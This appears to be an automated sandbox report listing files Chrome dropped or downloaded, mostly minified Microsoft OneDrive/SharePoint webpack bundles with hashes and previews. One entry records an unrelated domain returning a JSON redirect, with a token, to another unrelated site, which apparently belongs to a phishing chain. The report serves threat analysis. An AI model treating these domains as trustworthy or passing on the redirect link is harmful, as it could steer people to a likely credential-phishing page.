                                                            SHA1:64F894A624A0F7F535F635E4052B2FD21E33F058
                                                            SHA-256:61263ADF78A3A60A2EB86153BC03DCC8C2D569C489C7557CE21C8F67CFF8A0B0
                                                            SHA-512:F50FB79AAD9E6D34AA901758EFC5E08AF0B429E62D4B7CCFEAA41E9AE4DE9F31A4920C72811EA8868D656DB698D498C53CC92C3B6AEDC62632A6FD876AB50667
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/345.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[345,1156],{2940:function(e,t,n){n.r(t),n.d(t,{docAlreadyExists:function(){return s},fileNotFound:function(){return i},invalidView:function(){return r},listNotFound:function(){return o},newExperieceRenderingNotSupported:function(){return d},offline:function(){return f},onePageNavigationError:function(){return u},onePageNavigationViewMismatch:function(){return l},parsingError:function(){return p},queryThrottled:function(){return c},urlTooLongError:function(){return a.a}});var a=n(616),i=-2147024894,r=-2147024809,o=-1,s=-2130575257,c=-2147024860,d=-2,l=-3,u=-4,f=-5,p=-7}.,2939:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return c},c:function(){return o},d:function(){return s},e:function(){return r}});var a,i=n(2940);!function(e){e[e.icon=16]="icon",e[e.iconMin=16]="iconMin",e[e.bigIcon=48]="bigIcon",e[e.bigIconMin=48]="bigIconMin",e[e.regularMin=90]="regularMin",e[e.regular=130]="regular",e[e.nameM
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (35029)
                                                            Category:dropped
                                                            Size (bytes):37209
                                                            Entropy (8bit):5.386590479083565
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9A1B9A41979324B75214AA96F4A69814
                                                            SHA1:B9EB6A5077D2783B954FA9F1A6E9CC05D866A008
                                                            SHA-256:58B0C0AB4A90CF390406A5E6AE47028DA9F1F9E9420B0F671E4D063754C4B690
                                                            SHA-512:D0A9BE25A89BDDD840E1958C26EAFF8B283C724A5343F9D17829D550F81652410C75514CF1D7AAD391925006F55C1A33B676697B0D8D2907F9E9C2ADB597EE2C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[66],{6708:function(e,t){var n=function(){function e(){this.R=0,this.G=0,this.B=0,this.A=e.maxComponent}return e.clone=function(t){return e.fromRgba(t.R,t.G,t.B,t.A)},e.equals=function(e,t){var n=!e,a=!t;return n||a?n&&a:e.R===t.R&&e.G===t.G&&e.B===t.B&&e.A===t.A},e.fromRgba=function(t,n,a,i){var r=new e;return r.R=Math.round(t),r.G=Math.round(n),r.B=Math.round(a),r.A=null!=i?Math.round(i):e.maxComponent,r},e.fromRgbaString=function(t){var n=new e;if(/^rgb.+/.test(t)){var a=t.match(/[\d.]+/g);n=e.fromRgba(Number(a[0]),Number(a[1]),Number(a[2]),4===a.length?Number(a[3])*e.maxComponent:null)}return n},e.fromHtmlColor=function(t){function n(e,t,n){return parseInt(e.charAt(t)+e.charAt(n),16)}var a=new e;if("string"==typeof t&&"#"===t.charAt(0))switch(t.length){case 9:a.A=n(t,1,2),a.R=n(t,3,4),a.G=n(t,5,6),a.B=n(t,7,8);break;case 7:a.R=n(t,1,2),a.G=n(t,3,4),a.B=n(t,5,6);break;case 4:a.R=n(t,1,1),a.G=n(t,2,2),a.B=n(
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:downloaded
                                                            Size (bytes):31474
                                                            Entropy (8bit):5.170692365133356
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9005048A84645AAC8943CAF6D9FAD1B2
                                                            SHA1:2653108829E0DCFF29C292AF115667A3C9ABF5C7
                                                            SHA-256:AC9FC83AFB4885D8DF58307DEFD8182E7B3B37361A97F155EB01BD5FE3198B36
                                                            SHA-512:CB8677DFD0AE55E3DB4FADD2F2A35404C23924F5A1A33F9FCBEE1FE3F9032B5B196124E301BDB47480DEEE6A902C454B669B810AC6F6095B9C65F5C6F7E89C7C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://shell.cdn.office.net/shellux/api/ShellBootInfo/business/OneShell/en-us
                                                            Preview:{"Architecture":1,"Audience":1,"Resources":{"Version":"1.20250109.6.0","CatalogXml":"<ResourceCatalog>\r\n <Resources>\r\n <Resource Key=\"_store_mecontrol-fluent-web_3_28_4-preview_4-d3fbec14282f28e41f08_node_modules_mecontrol_flue-7f2638\" Type=\"LTRRTLPath\">\r\n <RTLPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-d3fbec14282f28e41f08_node_modules_mecontrol_flue-7f2638.c85eabe9203867301fe1.rtl.js</RTLPath>\r\n <LTRPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-d3fbec14282f28e41f08_node_modules_mecontrol_flue-7f2638.c85eabe9203867301fe1.js</LTRPath>\r\n </Resource>\r\n <Resource Key=\"_store_mecontrol-fluent-web_3_28_4-preview_4-d3fbec14282f28e41f08_node_modules_mecontrol_flue-fdf53d\" Type=\"LTRRTLPath\">\r\n <RTLPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-d3fbec14282f28e41f08_node_modules_mecontrol_flue-fdf53d.d2e58258ac45ef3c782a.rtl.js</RTLPath>\r\n <LTRPath>suiteux.shell._store_mecontrol-fluent-we
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (26251)
                                                            Category:dropped
                                                            Size (bytes):63103
                                                            Entropy (8bit):5.176810686475418
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:55698673AA2A82F289142139796EB350
                                                            SHA1:8D20D3B74B2B2A4F1B69CE212212C663E65EA9F1
                                                            SHA-256:96746736853A41AA8F1786E81936C71BA59D024F77090DBC69A7310F51F81756
                                                            SHA-512:28DB93C6F40C7A30B51EF8889AA70BA6D9B6954CFD484491CAC79D78123EBB93C165DCEAB97CFEE64F032F7C38D106180D20C4C3E5F3704DB8417FD88B566C86
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[118],{4209:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("fui.util_261"),i=(0,a.VH)(function(e,t,n,i){return{root:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem",t,e.root,i&&e.isCompactRoot),pulsingBeacon:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem-pulsingBeacon",e.pulsingBeacon),personaContainer:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem-personaContainer",e.personaContainer,i&&e.isCompactPersonaContainer),activityPersona:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem-activityPersona",e.activityPersona,i&&e.isCompactPersona,!i&&n&&2===n.length&&e.doublePersona),activityTypeIcon:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem-activityTypeIcon",e.activityTypeIcon,i&&e.isCompactIcon),activityContent:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem-activityContent",e.activityContent,i&&e.isCompactContent),activityText:(0,a.t3)(e.__shadowConfig__,"ms-ActivityItem-activityText",e.activityText),commentText:(0,a.t3
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (7118)
                                                            Category:downloaded
                                                            Size (bytes):19411
                                                            Entropy (8bit):5.387640502098917
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E90B3757FDA75A7CEE71882CF93B9995
                                                            SHA1:7E0D98D4213CB618B62D2E8AD80CBFC9C79DAE8D
                                                            SHA-256:99F6AB91179761A685A07E9440B7B66B72603ED26AA532FB11E3FF85485B91B6
                                                            SHA-512:89A99875C4A203B2CF04CB33DCDDA4E2A633F9D0C19B8EE5DEFCA79368C0C66F334978DA4B4725C2EFDBE8BF46794E5DA858B2182BCD7623D11AC98A062532D1
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/152.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[152],{3388:function(e,t,n){n.d(t,{a:function(){return p}});var a=n("tslib_538"),i=n("odsp.util_517"),r=n(1399),o=n(17),s=n(333),c=n(1556),d=n(1557),l=n(54),u=n(1582),f=i.x9.isActivated("c6d1b5d4-7ee0-4569-bba3-66800296443b"),p=new i.lh({name:"getItemKeyFromViewParams",factory:{dependencies:{appPageContext:o.a},create:function(e){var t=e.appPageContext;function n(e){var n,i=e.viewParams,o=e.isNavigation,d=f?t.listUrl:i[s.e];if(i[c.a]&&!i[s.e]){var u=i,p=c.a,m=(u[p],(0,a.dc)(u,["symbol"==typeof p?p:p+""]));d=(i=(0,a.q5)((0,a.q5)({},m),((n={})[s.e]=i[c.a],n)))[c.a]}var _=new l.b({context:t}),h=_.getUrlParts({path:i[s.b],listUrl:d});return(0,r.a)({viewParams:i,appPageContext:t,itemUrlParts:h,itemUrlHelper:_,isOnePage:!1,isNavigation:o,isSearch:!!i[s.h]})}return{instance:function(e){var t,i;if(e[d.a]){var r=n({viewParams:(0,a.q5)((0,a.q5)({},e),(t={},t[d.a]="",t[s.b]=e[d.a],t)),isNavigation:!0}),o=n({viewParams:(0
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (19063)
                                                            Category:downloaded
                                                            Size (bytes):22026
                                                            Entropy (8bit):5.447566077943433
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E66405BBBBC9807E388AA4F90F514674
                                                            SHA1:B3F4A8DC31CDCE79046F49371CC93845380D91A2
                                                            SHA-256:013FD1844ECE0700C628C0BC7AF2E8B358CB1E621BAD51B29A1BEB06EA0BBC91
                                                            SHA-512:7C5643C9DC68B649D44FD89A9C0DCB383A095954E6054B7AE47024ACD2E82FFE17BF80B15D7B9C3D7601192284D4A6674A9E19E370229ADBED44EB87B72A83E7
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/17.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[17],{4143:function(e,t,n){var a,i,r;n.d(t,{a:function(){return a},b:function(){return i},c:function(){return r}}),function(e){e[e.regularUser=0]="regularUser",e[e.externalUser=1]="externalUser",e[e.group=2]="group",e[e.application=3]="application",e[e.linkedinUser=4]="linkedinUser"}(a||(a={})),function(e){e.graph="graph",e.sharepointSearch="sharepointSearch",e.substrate="substrate"}(i||(i={})),function(e){e.unified="unifiedGroup",e.securityGroup="securityGroup",e.SPGroup="SPGroup",e.PublicDistributionList="PublicDistributionList",e.family="family"}(r||(r={}))}.,9141:function(e,t,n){n.d(t,{a:function(){return x}});var a=n("tslib_538"),i=n(4143),r=n(332),o=n("odsp.util_517"),s=n(79),c=n(911),d=n(2763),l=n(21),u=n(2749),f=n(107),p=n(1835),m=n(3804),_=n(1299),h=n(9142),b=n(56),g=n(10),v=n(261),y=!o.x9.isActivated("b7426b02-fdf6-4c5e-9809-e0c21db41db7","07/10/2022","remove hard code graph endpoint and read from sp
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (45758)
                                                            Category:dropped
                                                            Size (bytes):53350
                                                            Entropy (8bit):5.394840497971413
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9ADD208CAEE78C61440A307995376C82
                                                            SHA1:3197314BE0C6072CBD1D4E21E3895411345D900E
                                                            SHA-256:42310E4FE0032F4B9962083D2ACD0D4A48A307B4B60F4E30B53FF5AB188BBE34
                                                            SHA-512:301BD9B39CFBF3EF4DDE6DCB3749AD24EAD52C5812856479C035CE81373BA4D7C3B8DF22B1F895EDFDE626F822DE37A57BE127A6FAEE6A174BED17F543C5D25D
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[189],{2215:function(e,t,n){n.r(t),n.d(t,{ContextualControlHandlersProvider:function(){return u},ControlHandlerProvider:function(){return l},RootContextualControlHandlerBridge:function(){return r.b},controlHandlersMemoizer:function(){return d},createContextualControlHandlerProvider:function(){return r.c},createUseElementsWithContextualControlHandlers:function(){return r.d},renderChildrenWithControlHandlers:function(){return f},renderElementsWithContextualControlHandlers:function(){return m},useComposedControlHandlers:function(){return _},useElementsWithContextualControlHandlers:function(){return p}});var a=n("tslib_538"),i=n("react-lib"),r=n(94),o=n(1),s=n("fui.util_261"),c=n(45),d=(0,s.NN)(function(e){return(0,s.NN)(function(t){return(0,a.q5)((0,a.q5)({},e),(0,c.b)(t,function(t,n){var a=o.a.get(n),i=e[a.id];return i&&a.compose(t,i)||t}))})});function l(e){var t=e.controlHandlers;return p(e.children,t)}functio
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:dropped
                                                            Size (bytes):990
                                                            Entropy (8bit):4.878057615238074
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:199626DC652C1654974D523091BDC7A4
                                                            SHA1:4F4724C50A31E020C935B09D0D00B33CAF7524D4
                                                            SHA-256:E477A44C29C0BE30EA8E5E8EDF66C9B50355EB05E3AC240767CD1209B3CC18C9
                                                            SHA-512:7578466025B976D65231A84F6E1A2832FC1B9627B17EC442B7C4E1BC79B4641FF95B24238A5092BEF3A5429550EB221D7E34E72347F590619F2757026533FD15
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:<svg width="32" height="32" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M28 11H4V7.5c0-.275.225-.5.5-.5h23c.275 0 .5.225.5.5V11zm-.5 14h-23a.501.501 0 0 1-.5-.5V12h24v12.5c0 .275-.225.5-.5.5z" fill="#fff"/><path opacity=".67" fill-rule="evenodd" clip-rule="evenodd" d="M27.5 6h-23C3.673 6 3 6.673 3 7.5v17c0 .827.673 1.5 1.5 1.5h23c.827 0 1.5-.673 1.5-1.5v-17c0-.827-.673-1.5-1.5-1.5zm-23 1h23c.275 0 .5.225.5.5V11H4V7.5c0-.275.225-.5.5-.5zm0 18h23c.275 0 .5-.225.5-.5V12H4v12.5c0 .276.224.5.5.5z" fill="#605E5C"/><path d="M6 10a1 1 0 1 0 0-2 1 1 0 0 0 0 2zM9 10a1 1 0 1 0 0-2 1 1 0 0 0 0 2zM12 10a1 1 0 1 0 0-2 1 1 0 0 0 0 2z" fill="#C8C6C4"/><path clip-rule="evenodd" d="M16 22.5a4.5 4.5 0 1 0 0-9 4.5 4.5 0 0 0 0 9z" stroke="#69AFE5"/><path clip-rule="evenodd" d="M16 22.5c.828 0 1.5-2.015 1.5-4.5s-.672-4.5-1.5-4.5-1.5 2.015-1.5 4.5.672 4.5 1.5 4.5z" stroke="#69AFE5"/><path d="M12 17h8v-1h-8v1zm0 3h8v-1h-8v1z" fill="#69AFE5"/></svg>
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:downloaded
                                                            Size (bytes):332
                                                            Entropy (8bit):5.77346100992153
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:4D792AD3342F16F0BD25503B5BA495C0
                                                            SHA1:79BE05D86F7986A0722935FED4C86308A7E1ACFF
                                                            SHA-256:A6EC842AAF8BBD5DDC51B6C41FCE3740419171E231FCD9122FB8A77031EC9364
                                                            SHA-512:C1FB6834BC50E7D5F024D027ED3F3CB1F6807C9F16025045A1A1FDA6DEE78F6ABB13BD381A09A27178780612F0B19B0A95814F4FD20C0FB8F71E47EC92A9D9B3
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://totaipower.ca/?kytzqynn
                                                            Preview:{"url":"https://avaraconstructions.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2F2YXJhY29uc3RydWN0aW9ucy5jb20vIiwiZG9tYWluIjoiYXZhcmFjb25zdHJ1Y3Rpb25zLmNvbSIsImtleSI6InZQbGNCYjJ5czdqeiIsInFyYyI6bnVsbCwiaWF0IjoxNzM2Nzk3NzQ2LCJleHAiOjE3MzY3OTc4NjZ9.z3OgxSCtUfWQpS0bvfSMUKvWj3RgKI1ngXxlCoyGoqs","frame":true}
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (8159)
                                                            Category:downloaded
                                                            Size (bytes):9784
                                                            Entropy (8bit):5.344305780573991
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:5478AD8BAC22B8EE0CCB0F04C24F1124
                                                            SHA1:BFC855D495388773A95A8763030C7FE616882D4E
                                                            SHA-256:7A229995021D9448C01E52EE264B2B915869D3B1FD31483E3F64613ACB1A33D7
                                                            SHA-512:3ED904B1FB3BA1FC896A325A80C35D6E69DB2B4C0571D0EC221EAFB785A91EBEFFE3C985D03B6B1B13778519F016AF1DC9005B10443E98537B5A95B964775146
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/36.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[36],{9728:function(e,t,n){n.d(t,{a:function(){return L},b:function(){return D},c:function(){return A}});var a=n("tslib_538"),i=n(12),r=n(14),o=n(406),s=n(76),c=n(631),d=n(10),l=n(415),u=n("odsp.util_517"),f=n(6677),p=n(556),m=n(36),_=n(98),h=n(381),b=n(2030),g=n(2029),v=n(6683),y=n(9729),S=n(1212),D=u.x9.isActivated("03602390-d293-4f7e-bfaa-9e0a0c0ef730"),I=u.x9.isActivated("b2bdd32b-7546-476c-be48-4d07dc4ae32c"),x=u.x9.isActivated("6ee65b7d-df17-4fd7-830c-0dbab64b254a"),C="cmdbar-itm-click",O="command-bar-menu-id",w=(0,f.a)("commandbarsubmenus=0"),E=(0,p.b)({loader:function(){return(0,a.yv)(void 0,void 0,void 0,function(){return(0,a.SO)(this,function(e){switch(e.label){case 0:return[4,n.e(403).then(n.bind(n,2217))];case 1:return[2,e.sent().ContextualMenu]}})})}});function A(e){var t=this,u=e.classes,f=void 0===u?{}:u,p=e.commandSetProvider,A=e.QosEvent,L=void 0===A?d.a:A,M=e.onOpenContextMenu,P=e.experimenta
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (14128)
                                                            Category:dropped
                                                            Size (bytes):14227
                                                            Entropy (8bit):5.1858472300750345
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E22E387C5D89CF1A118D0787E743E39B
                                                            SHA1:887F031D4585C46876FE90049AE5338D139742EE
                                                            SHA-256:3DF3B9D44A89ADA10C0BE2007AC599DDF406D17B4AF30B69D6C156208964FF9D
                                                            SHA-512:7B30C36A3022DB47834ACA551DBC890D47A52CEFE551DEDD79AF0EBEA6F858CAF5ED113D2F85F35E0613BFCA222C3E3F17D0B3C358CC45BDAEEE2790F4330877
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[13],{2819:function(e,t,n){n.d(t,{a:function(){return y}});var a=n("tslib_538"),i=n("react-lib"),r=n("fui.util_261"),o=n(131),s=n(285),c=n(49),d=n(978),l=n(2820),u=n(148),f=function(e){if(void 0===e)return 0;var t=0;return"scrollTop"in e?t=e.scrollTop:"scrollY"in e&&(t=e.scrollY),Math.ceil(t)},p=function(e,t){"scrollTop"in e?e.scrollTop=t:"scrollY"in e&&e.scrollTo(e.scrollX,t)},m=n(132),_=n(286),h={top:-1,bottom:-1,left:-1,right:-1,width:0,height:0},b=function(e){return e.getBoundingClientRect()},g=b,v=b,y=function(e){function t(t){var n=e.call(this,t)||this;return n._root=i.createRef(),n._surface=i.createRef(),n._pageRefs={},n._getDerivedStateFromProps=function(e,t){return e.items!==n.props.items||e.renderCount!==n.props.renderCount||e.startIndex!==n.props.startIndex||e.version!==n.props.version||!t.hasMounted&&n.props.renderEarly&&(0,r.PX)()?(n._resetRequiredWindows(),n._requiredRect=null,n._measureVersion++
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (5140)
                                                            Category:dropped
                                                            Size (bytes):31137
                                                            Entropy (8bit):5.441023706885667
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:4310579C5E8330052B1B14EBFFA1DE16
                                                            SHA1:8037DB8810897D8A26D8ACB67C30370A134DBF07
                                                            SHA-256:F240A72AC4A3E79E711718F1983F4E18556AF0276CA398C9E0C3B579DEAEA389
                                                            SHA-512:71AF556B5BB428B5C248F4FC0F68B1579FD3C7D5514CE3C462D9C316B24B27830FA8C6BF1136D36D1921D1B823D481D0F5801F158F75AC19F0CA134DB744D82F
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[409,345,1156,59],{3630:function(e,t,n){n.d(t,{a:function(){return s},b:function(){return d}});var a=n(5298),i=n(1939),r=n(9247),o=n("odsp.util_517").x9.isActivated("686714b6-ee9c-44e7-9cc2-1fbe75a88eac"),s={ID:"",displayName:r.b,realFieldName:"File size",internalName:"FileSizeDisplay",type:i.a.FileSize,width:150,isCalculated:!0,isReadOnly:!0,isSortable:!0,isEditable:!1,rawFieldData:{FieldType:"FileSize",Name:"FileSizeDisplay",Groupable:"FALSE"}},c={ID:"",displayName:r.a,realFieldName:"Activity",internalName:"FileActivity",type:i.a.FileActivity,width:445,isCalculated:!0,isSortable:!1,isReadOnly:!0,isEditable:!1};function d(e,t){var n=[],i=null;if((0,a.a)(t)){for(var r=0,d=e;r<d.length;r++){var l=d[r];"SharedWith"===l.internalName?i=l:n.push(l)}return o&&n.push(s),i&&n.push(i),n.push(c),n}return e}}.,5837:function(e,t,n){n.r(t),n.d(t,{createExecutorForItemsScopeActionKey:function(){return M}});var a=n("tslib_53
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (30291)
                                                            Category:dropped
                                                            Size (bytes):105787
                                                            Entropy (8bit):5.39019257062293
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:F5C0476A8F1F29E52008D5328694A63A
                                                            SHA1:AD3F5F53B9BDD37DE93D3D5DF6AB33FA16C83A5C
                                                            SHA-256:CD825B2E6DD97378534FCCDBFC3918224D71302599A9C80A3873F1871E243D24
                                                            SHA-512:26891D370279C71E04AFBA144E2811F7A8377144E1F69164EFA6AA4F8ADB6F2176957D3E8599FE51C20EA409083386A3DB8CA02FC85762F5A874E14E8AD6A46E
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_otellogging_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["otellogging"],{76626:function(n,t,e){var r=e(92855),i=e(41230),o=e(68340),u=e(8101),a=e(15164),c=e(27039),s=e(75184),f=e(62657),l=e(84414),d=function(n){function t(){var e=n.call(this)||this;return e.pluginVersionStringArr=[],(0,i.A)(t,e,(function(n,t){n.logger&&n.logger.queue||(n.logger=new o.wq({loggingLevelConsole:1})),n.initialize=function(e,r,i,s){(0,u.r2)(n,(function(){return"AppInsightsCore.initialize"}),(function(){var u=n.pluginVersionStringArr;if(e){e.endpointUrl||(e.endpointUrl=f.S);var l=e.propertyStorageOverride;!l||l.getProperty&&l.setProperty||(0,a.$8)("Invalid property storage override passed."),e.channels&&(0,a.Iu)(e.channels,(function(n){n&&(0,a.Iu)(n,(
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (9887)
                                                            Category:downloaded
                                                            Size (bytes):32048
                                                            Entropy (8bit):5.3742184708313685
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:4DAA6BBCC70461846F5D5FDAA2ED9F3B
                                                            SHA1:81865ACC935E059C9CA78F914B771914C24BA112
                                                            SHA-256:30DB74E216E84F042375DB3E626B4A5F35CA36B0F6AB39294A6D9B24A22D7C9C
                                                            SHA-512:806E5671103B647996F795E3F083EC3CE183424306F2CFE7F3A04599F273BA68C8CC749988ABF003983275EB5E65A640DE7DD76402DC0C8B864E589FC4B58934
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/85.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[85,429,433,441],{6641:function(e,t,n){n.d(t,{a:function(){return H}});var a=n("tslib_538"),i=n(20),r=n(67),o=n(74),s=n(31),c=n(7),d=n(1716),l=n(1717),u=n(80);function f(e,t){return{engagement:{objectType:"spJoinedTeam"}}}var p=n(114),m=n(356),_=n(5273),h=n(103),b=n(39),g=n(119),v=n(22),y=n(4562),S=n(42),D=n(5274),I=n(3809),x=n(1586);function C(e,t){var n=function(e,t){var n=this,i=t.stageItem;return i?(0,b.b)(function(e){var t=e.itemsScopeItemKey,r=e.currentItemKey;return function(e){return(0,a.yv)(n,void 0,void 0,function(){return(0,a.SO)(this,function(n){switch(n.label){case 0:return[4,e((0,g.a)(function(e){return e.demandItemFacet(c.a,r,{suppressGetItems:!1})}))];case 1:return n.sent()?[4,e(i({currentItemKey:r,itemsScopeItemKey:t}))]:[3,3];case 2:n.sent(),n.label=3;case 3:return[2]}})})}}):void 0}(0,{itemKey:t.itemKey,stageItem:t.stageItem});return n?{stageItem:n}:{}}function O(e,t){var n=this,i=t.stageIte
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (56566)
                                                            Category:downloaded
                                                            Size (bytes):735897
                                                            Entropy (8bit):5.522990903589658
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:37E600D62FD8C2607DEF8B6CC5ADCB25
                                                            SHA1:902D1DC3092AEC09777EDB8B5073C90618CA24D0
                                                            SHA-256:4B374833BB69F73B247A689AD856DAF384CFC399B8E2C574ABC205B2E6727B6A
                                                            SHA-512:221332159E39411DEB310837C3E0A0A1DAF1860C950F581CF5450C511EFBF14F26695A15A2DADA42C53F8728503DEB1DC72523AA3F8D2BE3B0C66B2EC938125A
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/1462.js
                                                            Preview:/*! For license information please see 1462.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1462],{6985:function(e,t,n){"use strict";n.d(t,{a:function(){return d},b:function(){return f},c:function(){return _},d:function(){return u},e:function(){return m},f:function(){return c},g:function(){return h},h:function(){return p},i:function(){return l}});var a=n(6986);function i(e,t){return e?e+"."+t:t}function r(e,t,n,r,o){void 0===o&&(o=4),r&&e.push((0,a.d)("".concat(i(t,n)),r,o))}function o(e,t,n,r){"boolean"==typeof r&&e.push((0,a.a)("".concat(i(t,n)),r))}function s(e,t,n,r){"number"==typeof r&&e.push((0,a.c)("".concat(i(t,n)),r))}var c,d={contractName:"Office.System.Activity",getFields:function(e){var t="Activity",n=[];return r(n,t,"CV",e.cV),s(n,t,"Duration",e.duration),s(n,t,"Count",e.count),s(n,t,"AggMode",e.aggMode),o(n,t,"Success",e.success),e.result&&n.push.apply(n,function(e){var t="Activity.Result",n=[];return s(n,t,"Code",e.code),r(n,t,"Type",e.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (15788)
                                                            Category:dropped
                                                            Size (bytes):15838
                                                            Entropy (8bit):5.364069819527161
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:100EBA937A38163985E24F919CBF2703
                                                            SHA1:CDDD243B5872EC765230EC1AF0599E907028C93E
                                                            SHA-256:99ED95AFD761494662ADAF1A16A856133F55C8B2E8EC2B668D85CCEB72EAACC9
                                                            SHA-512:7E2AAE9EE1EAFB4E80E3E21A8CE04E89B385B70192217DAD39CD7811A7E4A6AC0C6E3835D5D9960D19A2FF23322F9BA50D326286138C4E7E183AE06B6DFEB45A
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[30],{2552:function(e,t,n){n.d(t,{$:function(){return Ke},$b:function(){return et},A:function(){return ft},Ab:function(){return Z},Ac:function(){return it},B:function(){return de},Bb:function(){return Ot},C:function(){return ae},Cb:function(){return me},Cc:function(){return st},D:function(){return pt},Db:function(){return Pe},Dc:function(){return Tt},E:function(){return lt},Eb:function(){return W},Ec:function(){return We},F:function(){return At},Fb:function(){return K},G:function(){return Ze},Gb:function(){return _},H:function(){return Oe},Hb:function(){return Te},I:function(){return dt},Ib:function(){return $e},Ic:function(){return Ie},J:function(){return Be},Jb:function(){return re},K:function(){return qe},Kb:function(){return f},L:function(){return Ut},Lb:function(){return u},Lc:function(){return Lt},M:function(){return ut},Mb:function(){return ee},Mc:function(){return fe},N:function(){return tt},Nb:functio
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
